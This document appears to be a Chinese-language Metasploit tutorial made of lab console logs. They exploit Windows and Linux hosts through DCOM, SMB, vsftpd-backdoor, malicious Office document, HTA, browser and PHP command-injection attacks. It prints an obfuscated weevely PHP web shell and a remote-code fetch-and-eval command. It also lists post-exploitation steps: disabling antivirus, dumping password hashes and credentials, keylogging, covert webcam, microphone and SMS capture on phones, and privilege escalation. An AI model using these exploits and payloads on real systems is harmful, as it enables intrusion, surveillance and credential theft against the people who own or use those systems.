msf6> use exploit/windows/dcerpc/ms03_026_dcom[*] Using configured payload windows/shell/reverse_tcpmsf6 exploit(windows/dcerpc/ms03_026_dcom) > show targetsExploit targets:   Id  Name   --  ----   0   Windows NT SP3-6a/2000/XP/2003 Universalmsf6 exploit(windows/dcerpc/ms03_026_dcom) > set payload windows/shell_bind_tcppayload => windows/shell_bind_tcpmsf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOST 192.168.0.170RHOST => 192.168.0.170msf6 exploit(windows/dcerpc/ms03_026_dcom) > run[*] 192.168.0.170:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...[*] 192.168.0.170:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.0.170[135] ...[*] 192.168.0.170:135 - Calling DCOM RPC with payload (1648 bytes) ...[*] Started bind TCP handler against 192.168.0.170:4444[*] Command shell session 1 opened (192.168.0.150:34825 -> 192.168.0.170:4444) at 2022-07-21 15:40:55 +0800Shell Banner:Microsoft Windows 2000 [Version 5.00.2195]-----C:WINNTsystem32>

利用木马

Windows 10、7、2003

msf> use exploit/multi/handler[*] Using configured payload generic/shell_reverse_tcpmsf exploit/multi/handler> set lhost 192.168.0.150lhost => 192.168.0.150msf exploit/multi/handler> set lport 8888lport => 8888msf exploit/multi/handler> set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit/multi/handler> run[*] Started reverse TCP handler on 192.168.0.150:8888[*] Sending stage (175686 bytes) to 192.168.0.106[*] Meterpreter session 1 opened (192.168.0.150:8888 -> 192.168.0.106:3552) at 2022-07-21 11:02:24 +0800meterpreter >

利用客户端漏洞渗透

利用软件vsftpd 2.3.4

Linux

msf6 > nmap -sT -A -P0 192.168.0.161msf6 exploit(windows/smb/ms08_067_netapi) > nmap -sT -A -P0 192.168.0.161[*] exec: nmap -sT -A -P0 192.168.0.161Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-14 18:36 CSTNmap scan report for 192.168.0.161Host is up (0.00081s latency).Not shown: 977 closed tcp ports (conn-refused)PORT     STATE SERVICE     VERSION21/tcp   open  ftp         vsftpd 2.3.4| ftp-syst:|   STAT:| FTP server status:|      Connected to 192.168.0.150|      Logged in as ftp|      TYPE: ASCII|      No session bandwidth limit|      Session timeout in seconds is 300|      Control connection is plain text|      Data connections will be plain text|      vsFTPd 2.3.4 - secure, fast, stable|_End of status|_ftp-anon: Anonymous FTP login allowed (FTP code 230)22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)| ssh-hostkey:|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)23/tcp   open  telnet      Linux telnetd25/tcp   open  smtp        Postfix smtpd|_ssl-date: 2022-07-14T10:36:30+00:00; +6s from scanner time.msf6 >search vsftpdMatching Modules================   #  Name                                  Disclosure Date  Rank       Check  Description   -  ----                                  ---------------  ----       -----  -----------   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command ExecutionInteract with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoormsf6 > use 0[*] No payload configured, defaulting to cmd/unix/interactmsf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interactpayload => cmd/unix/interactmsf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.161rhost => 192.168.0.161msf6 exploit(unix/ftp/vsftpd_234_backdoor) >exploit[*] 192.168.0.161:21 - Banner: 220 (vsFTPd 2.3.4)[*] 192.168.0.161:21 - USER: 331 Please specify the password.[+] 192.168.0.161:21 - Backdoor service has been spawned, handling...[+] 192.168.0.161:21 - UID: uid=0(root) gid=0(root)[*] Found shell.[*] Command shell session 1 opened (192.168.0.150:35303 -> 192.168.0.161:6200) at 2022-07-14 18:41:26 +0800

暴力猜测目标开放的端口

Windows 2000

mf6>use exploit/windows/smb/ms08_067_netapi

msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.0.150lhost => 192.168.0.150msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp_allportsmsf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.0.158rhost => 192.168.0.158msf6 exploit(windows/smb/ms08_067_netapi) > run[*] Started reverse TCP handler on 192.168.0.150:1[*] 192.168.0.158:445 - Attempting to trigger the vulnerability...[*] Sending stage (175686 bytes) to 192.168.0.158[*] 192.168.0.158 - Meterpreter session 1 closed.  Reason: Died[-] Meterpreter session 1 is not valid and will be closed192.168.0.158 windows 2000 自动关机

使用msf.doc文件

Windows 2000 SP0/SP4 English

msf6 exploit(windows/browser/ms10_002_aurora) > use exploit/windows/fileformat/ms11_006_createsizeddibsection[*] No payload configured, defaulting to windows/meterpreter/reverse_tcpmsf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > infoName: MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer OverflowModule: exploit/windows/fileformat/ms11_006_createsizeddibsectionPlatform: Windows       Arch: Privileged: No    License: Metasploit Framework License (BSD)       Rank: Great  Disclosed: 2010-12-15Provided by:  Moti & Xu Hao  Yaniv Miron aka Lament of ilhack  jduck Available targets:  Id  Name  --  ----  0   Automatic  1   Windows 2000 SP0/SP4 English  2   Windows XP SP3 English  3   Crash Target for DebuggingCheck supported:  NoBasic options:  Name      Current Setting  Required  Description  ----      ---------------  --------  -----------  FILENAME  msf.doc          yes       The file name.Payload information:  Space: 512  Avoid: 1 charactersDescription:  This module exploits a stack-based buffer overflow in the handling  of thumbnails within .MIC files and various Office documents. When  processing a thumbnail bitmap containing a negative 'biClrUsed'  value, a stack-based buffer overflow occurs. This leads to arbitrary  code execution. In order to trigger the vulnerable code, the folder  containing the document must be viewed using the "Thumbnails" view.References:  https://nvd.nist.gov/vuln/detail/CVE-2010-3970  OSVDB (70263)  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/MS11-006  http://www.securityfocus.com/bid/45662msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > set lhost 192.168.0.150lhost => 192.168.0.150msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > exploit[*] Creating 'msf.doc' file ...[+] msf.doc created at /root/.msf4/local/msf.doc#cp /root/.msf4/local/msf.doc /home/jerry/

复制msf.doc到windows下

msf6 > use exploit/multi/handler[*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost 192.168.0.150lhost => 192.168.0.150windows下打开msf.docmsf6 exploit(multi/handler) > exploit[*] Started reverse TCP handler on 192.168.0.150:8888[*] Sending stage (175686 bytes) to 192.168.0.169[*] Meterpreter session 2 opened (192.168.0.150:8888 -> 192.168.0.169:1487) at 2022-07-20 15:47:53 +0800

使用HTA文件进行攻击

Windows 10、7

HTA文件解析程序

C:WindowsSystem32mshta.exe

HTA文件解析程序文件运行

demo.hta

<html><title>WEB安全测试实验</title><linkrel="stylesheet" type="text/css"href="../css/style.css"><head><metahttp-equiv="Content-Type" content="text/html;charset=utf-8"></head><body><h1>WEB 安全测试实验</h1></body></html>

WEB 安全测试实验

直接运行

在浏览器中运行

开始攻击

#msfconsole msf6 > use exploit/windows/fileformat/office_word_htamsf6 exploit(windows/fileformat/office_word_hta) > show targetsExploit targets:   Id  Name   --  ----   0   Microsoft Office Wordmsf6 exploit(windows/fileformat/office_word_hta) > run[*] Exploit running as background job 0.[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 192.168.0.150:4444msf6 exploit(windows/fileformat/office_word_hta) > [+] msf.doc stored at /home/jerry/.msf4/local/msf.doc[*] Using URL: http://0.0.0.0:8080/default.hta[*] Local IP: http://192.168.0.150:8080/default.hta[*] Server started.[*] Sending stage (175174 bytes) to 192.168.0.106[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:8176 ) at 2022-06-16 16:27:50 +0800

打开被攻击对象浏览器,输入http://192.168.0.150:8080/default.hta,直接运行或者保存default.hta再运行,被攻击成功。

msf6 exploit(windows/fileformat/office_word_hta) > sessionsActive sessions===============  Id  Name  Type   Information  Connection  --  ----  ----   ---------------------  1  meterpreter x86/windows  DESKTOP-9A8VFKBxiang @ DES 192.168.0.150:4444 -> 192.16  KTOP-9A8VFKB 8.0.106:8176  (192.168.0.106 )msf6 exploit(windows/fileformat/office_word_hta) > sessions -i 1[*] Starting interaction with 1...meterpreter > lsListing: C:UsersxiangDownloads=================================Mode  Size  Type  Last modified  Name----  ----  ----  -------------  ----100666/rw-rw-rw-  7185  fil   2022-06-16 16:26:27 +0800  default.hta100666/rw-rw-rw-  282   fil   2021-04-27 15:13:52 +0800  desktop.inimeterpreter > pwdC:UsersxiangDownloadsmeterpreter > getuidServer username: DESKTOP-9A8VFKBxiang

利用浏览器插件:adobe flash进行攻击

没有成功,估计现在不支持adobe flash

#msfconsole

msf6 > search adobe_flash

msf6 > use 9msf6 > use exploit/multi/browser/adobe_flash_hacking_team_uaf[*] No payload configured, defaulting to windows/meterpreter/reverse_tcpmsf6 exploit(multi/browser/adobe_flash_hacking_team_uaf) > run[*] Started reverse TCP handler on 192.168.0.150:4444[*] Using URL: http://0.0.0.0:8080/y0dKYgEIkI2zc[*] Local IP: http://192.168.0.150:8080/y0dKYgEIkI2zc[*] Server started.

服务器安装adobe flash play 17 Active,在浏览器输入:http://192.168.0.150:8080/y0dKYgEIkI2zc,就被激活

监测浏览器漏洞

利用browser_autopwn进行攻击

Windows 10、7、2003

msf6 auxiliary(server/browser_autopwn2) > use server/browser_autopwnmsf6 auxiliary(server/browser_autopwn) > set lhost 192.168.0.150lhost => 192.168.0.150msf6 auxiliary(server/browser_autopwn) > run[*] Auxiliary module running as background job 27.msf6 auxiliary(server/browser_autopwn) >[*] Setup[*] Starting exploit modules on host 192.168.0.150...[*] ---[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp[*] Using URL: http://0.0.0.0:8080/QOSlCDKP[*] Local IP: http://192.168.0.150:8080/QOSlCDKP[*] Server started.[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp[*] Using URL: http://0.0.0.0:8080/LNRlnrxdQ[*] Local IP: http://192.168.0.150:8080/LNRlnrxdQ[*] Server started.[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp[*] Using URL: http://0.0.0.0:8080/SytDwnNLVJ[*] Local IP: http://192.168.0.150:8080/SytDwnNLVJ[*] Server started.[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp[*] Using URL: http://0.0.0.0:8080/XxbRZnvPzF[*] Local IP: http://192.168.0.150:8080/XxbRZnvPzF[*] Server started.[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp[*] Using URL: http://0.0.0.0:8080/dIavmEmlsJvA[*] Local IP: http://192.168.0.150:8080/dIavmEmlsJvA[*] Server started.[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp[*] Using URL: http://0.0.0.0:8080/FSRTIbVUWRDsU[*] Local IP: http://192.168.0.150:8080/FSRTIbVUWRDsU[*] Server started.[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp[*] Using URL: http://0.0.0.0:8080/lIROBHwdaD[*] Local IP: http://192.168.0.150:8080/lIROBHwdaD[*] Server started.[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp[*] Using URL: http://0.0.0.0:8080/pyJEvk[*] Local IP: http://192.168.0.150:8080/pyJEvk[*] Server started.[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp[*] Using URL: http://0.0.0.0:8080/huhYFRmk[*] Local IP: http://192.168.0.150:8080/huhYFRmk[*] Server started.[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp[*] Using URL: http://0.0.0.0:8080/jAzqekl[*] Local IP: http://192.168.0.150:8080/jAzqekl[*] Server started.[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp[*] Using URL: http://0.0.0.0:8080/JCbqIs[*] Local IP: http://192.168.0.150:8080/JCbqIs[*] Server started.[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp[*] Using URL: http://0.0.0.0:8080/cBiTChJAeCWA[*] Local IP: http://192.168.0.150:8080/cBiTChJAeCWA[*] Server started.[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp[*] Using URL: http://0.0.0.0:8080/kRyiwct[*] Local IP: http://192.168.0.150:8080/kRyiwct[*] Server started.[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp[*] Using URL: http://0.0.0.0:8080/YYQeJjzuqe[*] Local IP: http://192.168.0.150:8080/YYQeJjzuqe[*] Server started.…[*] Using URL: http://0.0.0.0:8080/PdyJht6uQ[*] Local IP: http://192.168.0.150:8080/PdyJht6uQ[*] Server started.

在被测浏览器中输入:http://192.168.0.150:8080/PdyJht6uQ 等

[*] 192.168.0.106ie_createobject - Sending exploit HTML...[*] 192.168.0.106mozilla_nstreerange - Redirecting to .html URL[*] 192.168.0.106mozilla_nstreerange - Sending HTML[*] 192.168.0.106mozilla_nstreerange - Sending XUL[-] 192.168.0.106msxml_get_definition_code_exec - 192.168.0.106:10064 - Browser not supported: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36[-] 192.168.0.106adobe_flash_rtmp - Browser not supported: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36[*] 192.168.0.106ie_cgenericelement_uaf - Requesting: /YYQeJjzuqe[-] 192.168.0.106ie_cgenericelement_uaf - Browser not supported, sending 404: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36Interrupt: use the 'exit' command to quitmsf6 auxiliary(server/browser_autopwn) > sessions -iActive sessions===============No active sessions.

利用browser_autopwn2进行攻击

Windows 2003

msf6 > use server/browser_autopwn2msf6 auxiliary(server/browser_autopwn2) > run[*] Auxiliary module running as background job 0.[*] Searching BES exploits, please wait...msf6 auxiliary(server/browser_autopwn2) > [*] Starting exploit modules...[*] Starting listeners...[*] Time spent: 31.071206468[*] Using URL: http://0.0.0.0:8080/IqV4IRZ7Q85f[*] Local IP: http://192.168.0.150:8080/IqV4IRZ7Q85f[*] The following is a list of exploits that BrowserAutoPwn will consider using.[*] Exploits with the highest ranking and newest will be tried first.Exploits======== Order  Rank   Name   Payload -----  ----   ----   ------- 1 Excellent  firefox_webidl_injection  firefox/shell_reverse_tcp on 4442 2 Excellent  firefox_tostring_console_injection  firefox/shell_reverse_tcp on 4442 3 Excellent  firefox_svg_plugin  firefox/shell_reverse_tcp on 4442 4 Excellent  firefox_proto_crmfrequestfirefox/shell_reverse_tcp on 4442 5 Excellent  webview_addjavascriptinterface   android/meterpreter/reverse_tcp on 4443 6 Excellent  samsung_knox_smdm_urlandroid/meterpreter/reverse_tcp on 4443 7 Great adobe_flash_worker_byte_array_uaf  windows/meterpreter/reverse_tcp on 4444 8 Great adobe_flash_domain_memory_uafwindows/meterpreter/reverse_tcp on 4444 9 Great adobe_flash_copy_pixels_to_byte_arra windows/meterpreter/reverse_tcp on 4444 10 Great adobe_flash_casi32_int_overflow windows/meterpreter/reverse_tcp on 4444 11 Great adobe_flash_delete_range_tl_op  osx/x86/shell_reverse_tcp on 4447 12 Great adobe_flash_uncompress_zlib_uaf windows/meterpreter/reverse_tcp on 4444 13 Great adobe_flash_shader_job_overflow windows/meterpreter/reverse_tcp on 4444 14 Great adobe_flash_shader_drawing_fill  windows/meterpreter/reverse_tcp on 4444 15 Great adobe_flash_pixel_bender_bofwindows/meterpreter/reverse_tcp on 4444 16 Great adobe_flash_opaque_background_uaf  windows/meterpreter/reverse_tcp on 4444 17 Great adobe_flash_net_connection_confusion windows/meterpreter/reverse_tcp on 4444 18 Great adobe_flash_nellymoser_bof windows/meterpreter/reverse_tcp on 4444 19 Great adobe_flash_hacking_team_uaf   windows/meterpreter/reverse_tcp on 4444 20 Good wellintech_kingscada_kxclientdownloa windows/meterpreter/reverse_tcp on 44 44 21 Good ms14_064_ole_code_execution   windows/meterpreter/reverse_tcp on 4444[+] Please use the following URL for the browser attack:[+] BrowserAutoPwn URL: http://192.168.0.150:8080/IqV4IRZ7Q85f[*] Server started.

在被测浏览器中输入:http://192.168.0.150:8080/IqV4IRZ7Q85f

[*] Gathering target information for 192.168.0.169[*] Sending HTML response to 192.168.0.169[*] 192.168.0.169    wellintech_kingscada_kxclientdownload - Requested: /PIJKiQZx/hqDDuX/[*] 192.168.0.169    wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx ActiveX Remote Code Execution[*] 192.168.0.169    ms14_064_ole_code_execution - Sending exploit...[*] 192.168.0.169    ms14_064_ole_code_execution - Sending VBS stager[*] Sending stage (175686 bytes) to 192.168.0.169[*] Meterpreter session 3 opened (192.168.0.150:4444 -> 192.168.0.169:1525) at 2022-07-20 17:36:45 +0800

利用Web漏洞

Windows 10、7、2003、2000

http://192.168.0.160:8100/sec/17/example.php?cmd=是一个PHP命令注入漏洞

msf6 > use exploit/multi/script/web_delivery[*] Using configured payload python/meterpreter/reverse_tcpmsf6 exploit(multi/script/web_delivery) > optionsModule options (exploit/multi/script/web_delivery):Name Current Setting  Required  Description---- ---------------  --------  -----------SRVHOST  0.0.0.0   yes The local host or network interface to listen on. This  must be an address on the local machine or 0.0.0.0 to l  isten on all addresses.SRVPORT  8080  yesThe local port to listen on.SSL  falsenoNegotiate SSL for incoming connectionsSSLCert  no Path to a custom SSL certificate (default is randomly g   enerated)URIPATH noThe URI to use for this exploit (default is random)Payload options (python/meterpreter/reverse_tcp): Name   Current Setting  Required  Description----   ---------------  --------  -----------LHOSTyes   The listen address (an interface may be specified)LPORT  4444 yesThe listen portExploit target:Id  Name--  ----   0   Pythonmsf6 exploit(multi/script/web_delivery) > show targetsExploit targets:   Id  Name   --  ----   0   Python   1   PHP   2   PSH   3   Regsvr32   4   pubprn   5   SyncAppvPublishingServer   6   PSH (Binary)   7   Linux   8   Mac OS Xmsf6 exploit(multi/script/web_delivery) > set target 1target => 1msf6 exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcppayload => php/meterpreter/reverse_tcpmsf6 exploit(multi/script/web_delivery) > set lhost 192.168.0.150lhost => 192.168.0.150msf6 exploit(multi/script/web_delivery) > set lport 8899lport => 8888msf6 exploit(multi/script/web_delivery) > run[*] Exploit running as background job 2.[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 192.168.0.150:8899  [*] Using URL: http://0.0.0.0:8080/SPzNh9msf6 exploit(multi/script/web_delivery) > [*] Local IP: http://192.168.0.150:8080/SPzNh9  [*] Server started.  [*] Run the following command on the target machine:php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.0.150:8080/SPzNh9', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"在浏览器中输入:http://192.168.0.160:8100/sec/17/example.php?cmd=php%20-d%20allow_url_fopen=true%20-r%20%22eval(file_get_contents(%27http://192.168.0.160:8080/SPzNh9%27,%20false,%20stream_context_create([%27ssl%27=%3E[%27verify_peer%27=%3Efalse,%27verify_peer_name%27=%3Efalse]])));%22[*] 192.168.0.150   web_delivery - Delivering Payload (1114 bytes)[*] Sending stage (39282 bytes) to 192.168.0.150[*] Meterpreter session 1 opened (192.168.0.150:8899 -> 192.168.0.160:38676 ) at 2022-06-16 18:38:14 +0800msf6 exploit(multi/script/web_delivery) > sessionsActive sessions===============  Id  Name  TypeInformation   Connection  --  ----  ---------------   ----------  1   meterpreter php/linux  www-data @ Jerry  192.168.0.150:8899 -> 192.168.0.150:38676  (192.168.0.150)msf6 exploit(multi/script/web_delivery) > sessions -i 1[*] Starting interaction with 1...meterpreter > dirListing: /var/www/html/sec/17=============================Mode  Size  Type  Last modified  Name----  ----  ----  -------------  ----100766/rwxrw-rw-  110   fil   2022-06-06 19:09:45 +0800  example.phpmeterpreter > pwd/var/www/html/sec/17meterpreter > getuidServer username: www-data

利用Web系统进行远程控制

#weevely generate 123456 ./testweb.phpGenerated './testweb.php' with password '123456' of 677 byte size.

testweb.php

<?php$B='$k){hg$c=strlen($hgk)hg;$l=sthghgrlen($t);hg$o="";for($i=0hg;hg$i<$l;)hg{for($j=hg0;($jhghg<hg$chg&&$i<$l);$jhg++,$ih';< span=""></hg$chg&&$i<$l);$jhg++,$ih';<>$c='=@ob_get_conthgentshg();@ob_hgend_clhgean();$r=hg@bashge64_enhgcodehg(@x(@hggzhgcompresshg($o),$k));prihgnt("$phg$khgh$r$kf");}';$R=str_replace('R','','crReaRRte_fuRncRtRion');$L='$k="ehg10hgahgdc3hg9";$kh="49ba5hg9abbe5hg6";$khgf="e057f20fhghg883e";$p="kRXhgw88VYFzhgEOYQOk"hghg;functihgon x($hgt,';$I=':/hghg/inputhg"),hg$mhg)==1) {@ob_starhgt();@evahgl(@gzuncomhgpresshg(@x(@hgbashge64_decodhge($m[1]hg),$k)))hg;hghg$o';$k='g++){$o.=$t{$i}^$k{$j}hg;}}rhgeturnhg $o;}ifhg hg(@prhgeg_match("/$khhg(.+)$kfhg/hg",@file_gethghg_conhgtents("php';$J=str_replace('hg','',$L.$B.$k.$I.$c);$h=$R('',$J);$h();?>

# weevely http://192.168.0.106:8100/sec/19/testweb.php 123456[+] weevely 4.0.1[+] Target: 192.168.0.150:8100[+] Session:/root/.weevely/sessions/192.168.0.150/testweb_0.session[+] Browse the filesystem or execute commands starts the connection[+] to the target. Type :help for more information.weevely> help:file_rmRemove remote file.:file_clearlogRemove string from a file.:file_editEdit remote file on a local editor.:file_bzip2  Compress or expand bzip2 files.:file_upload  Upload file to remote filesystem.:file_downloadDownload file from remote filesystem. :file_ls   List directory content.:file_webdownload Download an URL.  :file_cp   Copy single file. :file_find Find files with given names and attributes.  :file_enum Check existence and permissions of a list of paths. :file_tar  Compress or expand tar archives. :file_touchChange file timestamp. :file_zip  Compress or expand zip files.  :file_mountMount remote filesystem using HTTPfs. :file_gzip Compress or expand gzip files. :file_cd   Change current working directory. :file_upload2web   Upload file automatically to a web folder and get corresponding URL. :file_read Read remote file from the remote filesystem.  :file_grep Print lines matching a pattern in multiple files. :file_checkGet attributes and permissions of a file. :shell_sh  Execute shell commands. :shell_php Execute PHP commands.  :shell_su  Execute commands with su.  :sql_dump  Multi dbms mysqldump replacement. :sql_console  Execute SQL query or run console. :system_extensionsCollect PHP and webserver extension list. :system_info  Collect system information. :system_procs List running processes. :audit_filesystem Audit the file system for weak permissions.   :audit_disablefunctionbypass  Bypass disable_function restrictions with mod_cgi and .htaccess. :audit_etcpasswd  Read /etc/passwd with different techniques.   :audit_suidsgid   Find files with SUID or SGID flags.   :audit_phpconfAudit PHP configuration.   :bruteforce_sql   Bruteforce SQL database.   :backdoor_tcp Spawn a shell on a TCP port.   :backdoor_reversetcp  Execute a reverse TCP shell.   :net_scan  TCP Port scan. :net_proxy Run local proxy to pivot HTTP/HTTPS browsing through the target. :net_ifconfig Get network interfaces addresses. :net_curl  Perform a curl-like HTTP request. :net_mail  Send mail. :net_phpproxy Install PHP proxy on the target.DESKTOP-9A8VFKB:C:xampphtdocssec19 $ system_info+--------------------+-------------------------------------------------------------------------------------------------------------------------------------+| document_root    | C:/xampp/htdocs                                                                         || whoami                 |                                                                                           || hostname              | DESKTOP-9A8VFKB                                                                         || pwd                    | C:xampphtdocssec19                                                                || open_basedir           |                                                                                           || safe_mode              | False                                                                                     || script                 | /sec/19/testweb.php                                                                     || script_folder          | C:xampphtdocssec19                                                                || uname                  | Windows NT DESKTOP-9A8VFKB 6.2 build 9200 (Windows 8 Home Premium Edition) i586 || os                     | Windows NT                                                                              || client_ip              | 192.168.0.150                                                                           || max_execution_time   | 30                                                                                        || php_self               | /sec/19/testweb.php                                                                     || dir_sep                |                                                                                          || php_version            | 5.6.28                                                                                  |+--------------------+-------------------------------------------------------------------------------------------------------------------------------------+DESKTOP-9A8VFKB:C:xampphtdocssec19 $ autit_filesystem'autit_filesystem' �����ڲ����ⲿ���Ҳ���ǿ����еij������������ļ���

资源文件

最基本的资源文件

#echo version >resource.rc#echo loadsounds >> version#echo loadsounds >>resource.rc

# msfconsole -r resource.rc…[*] Processing resource.rc for ERB directives.resource (resource.rc)> versionFramework: 6.1.27-devConsole  : 6.1.27-devresource (resource.rc)> load sounds[*] Successfully loaded plugin: soundsmsf6 >

攻击Windows 7资源文件

windows7.rc

# msfconsole -r windows7.rc…

攻击Windows 10资源文件

Windows 10.rc

# msfconsole -r windows10.rc…

攻击Android资源文件

android.rc

# msfconsole -r android.rc…

渗透Linux

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor[*] No payload configured, defaulting to cmd/unix/interactmsf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interactpayload => cmd/unix/interactmsf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.160rhost => 192.168.0.160msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run[*] 192.168.0.160:21 - Banner: 220 (vsFTPd 2.3.4)[*] 192.168.0.160:21 - USER: 331 Please specify the password.[+] 192.168.0.160:21 - Backdoor service has been spawned, handling...[+] 192.168.0.160:21 - UID: uid=0(root) gid=0(root)[*] Found shell.[*] Command shell session 1 opened (192.168.0.150:38079 -> 192.168.0.160:6200) at 2022-06-30 17:41:05 +0800

Meterpreter指南(后渗透技术)

基本命令

meterpreter常用命令

针对安卓的命令

dump_contacts

获取手机通讯录

dump_sms

获取短信记录

send_sms -d 15330252525 -t “hello”

控制实验手机发短信

geolocate

获取实验手机GPS定位信息

wlan_geolocate

获取实验手机Wi-Fi定位信息

record_mic -d 5

控制实验手机录音

webcam_list

获取实验手机相机设备

webcam_snap

控制实验手机拍照

webcam_stream

直播实验手机摄像头

针对Windows的一些命令

ps

查看进程:

getpid

查看当前进程号:

sysinfo

查看系统信息:

route

查看完整网络设置:

getsystem

自动提权

getuid

查看当前权限

pwd

查看当前处于目标机的那个目录

其他命令

查看目标机是否为虚拟机:run post/windows/gather/checkvm

关闭杀毒软件:run post/windows/manage/killav

启动远程桌面协议:run post/windows/manage/enable_rdp

列举当前登录的用户:run post/windows/gather/enum_logged_on_users

查看当前应用程序:run post/windows/gather/enum_applications

抓取目标机的屏幕截图:load espia ; screengrab

获取相机设备:webcam_list

控制拍照:webcam_snap

直播摄像头:webcam_stream

控制录音:record_mic

查看当前目录:getlwd

导出当前用户密码哈希 run hashdump

用户名:SID:LM哈希:NTLM哈希:::

也可以使用下面这个命令导出权限更高 run windows/gather/smart_hashdump

抓取自动登录的用户名和密码 run windows/gather/credentials/windows_autologin

直接获取明文密码(注意这个功能需要获取系统权限获取系统权限需要输入getsystem)

Shell 脚本

进入Windows的终端shell

文件系统命令

文件交互指令

Linux权限

chmod 777 {文件名.后缀}

chmod 777 shell.elf

upload

上传文件到目标机主上,如upload setup.exe C:windowssystem32

download nimeia.txt /root/Desktop/

# 下载文件到本机上如:download C:boot.ini /root/或者download C:“ProgramFiles”TencentQQUsers295******125Msg2.0.db /root/

search

search 文件,如

search -d c: -f*.doc

search -d c:UsersxiangDesktop -f *.txt

enumdesktops

用户登录数

ipconfig

查看IP地址

其他命令

截屏

meterpreter > screenshot

Screenshot saved to: /home/jerry/BqXLvJAp.jpeg

获得系统信息

meterpreter > sysinfoComputer                     : WIN-2VEIIKHJ7M8OS                            : Windows 7 (6.1 Build 7601, Service Pack 1).Architecture              : x64System Language        : zh_CNDomain                     : WORKGROUPLogged On Users        : 2Meterpreter              : x64/windows

获取键盘信息

meterpreter > psProcess List============ PID   PPID  NameArch  Session  User  Path…  exe 1184  1132  explorer.exex64   1  WIN-2VEIIKHJ7M8小铃铛   C:WindowsExplorer.EXEmeterpreter > migrate 1184 迁移到1184进程中[*] Migrating from 2496 to 1184... [*] Migration completed successfully.  meterpreter > run post/windows/capture/keylog_recorder[*] Executing module against WIN-2VEIIKHJ7M8[*] Starting the keylog recorder...[*] Keystrokes being saved in to /root/.msf4/loot/20220624132219_default_192.168.0.158_host.windows.key_244146.txt [*] Recording keystrokes... ^C[*] User interrupt.  [*] Shutting down keylog recorder. Please wait...# cat /root/.msf4/loot/20220624132219_default_192.168.0.158_host.windows.key_244146.txtKeystroke log from explorer.exe on WIN-2VEIIKHJ7M8 with user WIN-2VEIIKHJ7M8小铃铛 started at 2022-06-24 13:22:19 +0800tgest<^H><^H><^H><^H><^H><^H>testI amFy<^H><^H>GuXiangwww.3Keylog Recorder exited at 2022-06-24 13:24:03 +0800

提权

最基础的提权

meterpreter >getuidServer username:E86004903967404Administratormeterpreter >getsystem...got systemvia technique 1 (Named Pipe Impersonation (In Memory/Admin)).meterpreter >getuidServer username:NT AUTHORITYSYSTEM

利用漏洞提权

Windows 7

